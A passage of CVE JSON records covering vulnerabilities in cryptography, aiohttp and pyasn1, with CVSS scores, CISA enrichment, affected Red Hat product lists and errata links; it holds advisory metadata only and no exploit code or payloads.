},
"title": "cryptography Subgroup Attack Due to Missing Subgroup Validation for SECT Curves"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-26007",
"datePublished": "2026-02-10T21:42:56.471Z",
"dateReserved": "2026-02-09T21:36:29.552Z",
"dateUpdated": "2026-07-01T12:04:53.754Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-34520 (GCVE-0-2026-34520)
Vulnerability from cvelistv5 – Published: 2026-04-01 20:27 – Updated: 2026-04-04 03:13- CWE-113 - Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2026-34520",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-04-04T03:13:19.553235Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-04-04T03:13:48.418Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "aiohttp",
"vendor": "aio-libs",
"versions": [
{
"status": "affected",
"version": "\u003c 3.13.4"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to version 3.13.4, the C parser (the default for most installs) accepted null bytes and control characters in response headers. This issue has been patched in version 3.13.4."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 2.7,
"baseSeverity": "LOW",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "LOW"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-113",
"description": "CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers (\u0027HTTP Request/Response Splitting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-01T20:27:48.350Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-63hf-3vf5-4wqf",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-63hf-3vf5-4wqf"
},
{
"name": "https://github.com/aio-libs/aiohttp/commit/9370b9714a7a56003cacd31a9b4ae16eab109ba4",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/commit/9370b9714a7a56003cacd31a9b4ae16eab109ba4"
},
{
"name": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"
}
],
"source": {
"advisory": "GHSA-63hf-3vf5-4wqf",
"discovery": "UNKNOWN"
},
"title": "AIOHTTP: C parser (llhttp) accepts null bytes and control characters in response header values - header injection / security bypass"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-34520",
"datePublished": "2026-04-01T20:27:48.350Z",
"dateReserved": "2026-03-30T16:03:31.047Z",
"dateUpdated": "2026-04-04T03:13:48.418Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-23490 (GCVE-0-2026-23490)
Vulnerability from cvelistv5 – Published: 2026-01-16 19:03 – Updated: 2026-07-01 12:05- CWE-770 - Allocation of Resources Without Limits or Throttling
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-23490",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-16T19:23:28.531270Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-16T19:23:51.965Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2026-02-01T17:06:14.113Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "https://lists.debian.org/debian-lts-announce/2026/02/msg00002.html"
}
],
"title": "CVE Program Container"
},
{
"affected": [
{
"cpes": [
"cpe:/o:redhat:rhel_els:7"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux Server (v. 7 ELS)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:7::server"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux Server HighAvailability (v. 7 ELS)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:7::server"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux Server ResilientStorage (v. 7 ELS)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_extras_sap_els:7"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux Server for SAP ELS (v. 7)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_extras_sap_hana_els:7"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux Server for SAPHANA ELS (v. 7)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2.5::el8",
"cpe:/a:redhat:ansible_automation_platform_developer:2.5::el8",
"cpe:/a:redhat:ansible_automation_platform_inside:2.5::el8"
],
"defaultStatus": "affected",
"product": "Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openstack:17.1::el8"
],
"defaultStatus": "affected",
"product": "Red Hat OpenStack Platform 17.1",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2.5::el9",
"cpe:/a:redhat:ansible_automation_platform_developer:2.5::el9",
"cpe:/a:redhat:ansible_automation_platform_inside:2.5::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2.6::el9",
"cpe:/a:redhat:ansible_automation_platform_developer:2.6::el9",
"cpe:/a:redhat:ansible_automation_platform_inside:2.6::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_ironic:4.17::el9"
],
"defaultStatus": "affected",
"product": "Ironic content for Red Hat OpenShift Container Platform 4.17",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_ironic:4.18::el9"
],
"defaultStatus": "affected",
"product": "Ironic content for Red Hat OpenShift Container Platform 4.18",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux_eus:10.0"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:10.1"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream (v. 10)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream (v. 8)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_aus:8.2::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream AUS (v. 8.2)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_aus:8.4::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream AUS (v.8.4)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_eus_long_life:8.4::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_aus:8.6::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream AUS (v.8.6)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_e4s:8.6::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_tus:8.6::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream TUS (v.8.6)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_e4s:8.8::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_tus:8.8::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream TUS (v.8.8)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_e4s:9.0::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream E4S (v.9.0)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_e4s:9.2::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream E4S (v.9.2)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_eus:9.4::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_eus:9.6::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream (v. 9)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::highavailability"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux HighAvailability (v. 8)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_aus:8.4::highavailability"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux High Availability AUS (v.8.4)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_eus_long_life:8.4::highavailability"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux HighAvailability EUS EXTENSION (v.8.4)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_e4s:8.6::highavailability"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux High Availability E4S (v.8.6)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_tus:8.6::highavailability"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux High Availability TUS (v.8.6)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_e4s:8.8::highavailability"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux High Availability E4S (v.8.8)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_tus:8.8::highavailability"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux High Availability TUS (v.8.8)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_e4s:9.0::highavailability"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux High Availability E4S (v.9.0)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_e4s:9.2::highavailability"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux High Availability E4S (v.9.2)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_eus:9.4::highavailability"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux High Availability EUS (v.9.4)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ai_inference_server:3.3::el9"
],
"defaultStatus": "affected",
"product": "Red Hat AI Inference Server 3.3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2.5::el8"
],
"defaultStatus": "affected",
"product": "Red Hat Ansible Automation Platform 2.5",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2.6::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Ansible Automation Platform 2.6",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ceph_storage:8::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Ceph Storage 8",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:enterprise_linux_ai:3.3::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AI 3.3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_ai:2.25::el9"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift AI 2.25",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_ai:3.3::el9"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift AI 3.3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:stf:1.5::el9"
],
"defaultStatus": "affected",
"product": "Red Hat OpenStack 1.5",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:trusted_artifact_signer:1.3::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Trusted Artifact Signer 1.3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:trusted_artifact_signer:1.4::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Trusted Artifact Signer 1.4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhui:5::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Update Infrastructure 5",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::resilientstorage"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux ResilientStorage (v. 8)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_e4s:9.0::resilientstorage"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux ResilientStorage E4S (v.9.0)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_e4s:9.2::resilientstorage"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux Resilient Storage E4S (v.9.2)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_eus:9.4::resilientstorage"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux Resilient Storage EUS (v.9.4)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:lightspeed_core"
],
"defaultStatus": "affected",
"product": "Lightspeed Core",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhmt:1"
],
"defaultStatus": "affected",
"product": "Migration Toolkit for Containers",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:migration_toolkit_virtualization:2"
],
"defaultStatus": "affected",
"product": "Migration Toolkit for Virtualization",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_lightspeed"
],
"defaultStatus": "affected",
"product": "OpenShift Lightspeed",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ai_inference_server:3"
],
"defaultStatus": "affected",
"product": "Red Hat AI Inference Server",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "affected",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_ai"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift AI (RHOAI)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift:4"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Container Platform 4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openstack:16.2"
],
"defaultStatus": "affected",
"product": "Red Hat OpenStack Platform 16.2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openstack:18.0"
],
"defaultStatus": "affected",
"product": "Red Hat OpenStack Platform 18.0",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:quay:3"
],
"defaultStatus": "affected",
"product": "Red Hat Quay 3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:satellite:6"
],
"defaultStatus": "affected",
"product": "Red Hat Satellite 6",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2.6::el10",
"cpe:/a:redhat:ansible_automation_platform_developer:2.6::el10"
],
"defaultStatus": "unaffected",
"product": "Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift:4.17::el8",
"cpe:/a:redhat:openshift:4.17::el9"
],
"defaultStatus": "unaffected",
"product": "Red Hat OpenShift Container Platform 4.17",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift:4.18::el8"
],
"defaultStatus": "unaffected",
"product": "Red Hat OpenShift Container Platform 4.18",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_mesh:3"
],
"defaultStatus": "unaffected",
"product": "OpenShift Service Mesh 3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:6"
],
"defaultStatus": "unaffected",
"product": "Red Hat Enterprise Linux 6",
"vendor": "Red Hat"
}
],
"datePublic": "2026-01-16T19:03:36.442Z",
"descriptions": [
{
"lang": "en",
"value": "A flaw was found in pyasn1, a generic ASN.1 library for Python. A remote attacker could exploit this vulnerability by sending a specially crafted RELATIVE-OID with excessive continuation octets. This input validation vulnerability leads to memory exhaustion, resulting in a Denial of Service (DoS) for the affected system."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Important"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-07-01T12:05:02.871Z",
"orgId": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"shortName": "redhat-SADP"
},
"references": [
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2026-23490"
},
{
"name": "RHBZ#2430472",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430472"
},
{
"tags": [
"x_sadp-csaf-vex"
],
"url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-23490.json"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:4148"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:2758"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:3959"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:13512"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:28042"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:3958"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:13508"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:17595"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:17446"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:2309"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:4138"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:1905"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:3354"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:1906"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:4146"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:4145"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:2483"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:4147"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:2486"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:4144"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:2221"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:4139"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:2303"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:4140"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:2300"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:4142"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:2302"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:4143"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:2299"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:4141"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:1903"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:3359"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:1904"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:2712"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:2453"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:2460"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:30088"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:13553"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:13545"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:24866"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:5606"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:17611"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:24977"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:19712"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:14020"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:24476"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:24483"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:4943"
}
],
"solutions": [
{
"lang": "en",
"value": "RHSA-2026:4148: Red Hat Enterprise Linux Server (v. 7 ELS)"
},
{
"lang": "en",
"value": "RHSA-2026:2758: Red Hat Enterprise Linux Server HighAvailability (v. 7 ELS), Red Hat Enterprise Linux Server ResilientStorage (v. 7 ELS), Red Hat Enterprise Linux Server for SAP ELS (v. 7), Red Hat Enterprise Linux Server for SAPHANA ELS (v. 7)"
},
{
"lang": "en",
"value": "RHSA-2026:3959: Red Hat Ansible Automation Platform 2.5 for RHEL 8, Red Hat Ansible Automation Platform 2.5 for RHEL 9"
},
{
"lang": "en",
"value": "RHSA-2026:13512: Red Hat Ansible Automation Platform 2.5 for RHEL 8, Red Hat Ansible Automation Platform 2.5 for RHEL 9"
},
{
"lang": "en",
"value": "RHSA-2026:28042: Red Hat OpenStack Platform 17.1"
},
{
"lang": "en",
"value": "RHSA-2026:3958: Red Hat Ansible Automation Platform 2.6 for RHEL 9"
},
{
"lang": "en",
"value": "RHSA-2026:13508: Red Hat Ansible Automation Platform 2.6 for RHEL 9"
},
{
"lang": "en",
"value": "RHSA-2026:17595: Ironic content for Red Hat OpenShift Container Platform 4.17"
},
{
"lang": "en",
"value": "RHSA-2026:17446: Ironic content for Red Hat OpenShift Container Platform 4.18"
},
{
"lang": "en",
"value": "RHSA-2026:2309: Red Hat Enterprise Linux AppStream EUS (v. 10.0)"
},
{
"lang": "en",
"value": "RHSA-2026:4138: Red Hat Enterprise Linux AppStream EUS (v. 10.0)"
},
{
"lang": "en",
"value": "RHSA-2026:1905: Red Hat Enterprise Linux AppStream (v. 10)"
},
{
"lang": "en",
"value": "RHSA-2026:3354: Red Hat Enterprise Linux AppStream (v. 10)"
},
{
"lang": "en",
"value": "RHSA-2026:1906: Red Hat Enterprise Linux AppStream (v. 8), Red Hat Enterprise Linux HighAvailability (v. 8), Red Hat Enterprise Linux ResilientStorage (v. 8)"
},
{
"lang": "en",
"value": "RHSA-2026:4146: Red Hat Enterprise Linux AppStream (v. 8)"
},
{
"lang": "en",
"value": "RHSA-2026:4145: Red Hat Enterprise Linux AppStream AUS (v. 8.2)"
},
{
"lang": "en",
"value": "RHSA-2026:2483: Red Hat Enterprise Linux AppStream AUS (v.8.4), Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4), Red Hat Enterprise Linux High Availability AUS (v.8.4), Red Hat Enterprise Linux HighAvailability EUS EXTENSION (v.8.4)"
},
{
"lang": "en",
"value": "RHSA-2026:4147: Red Hat Enterprise Linux AppStream AUS (v.8.4), Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)"
},
{
"lang": "en",
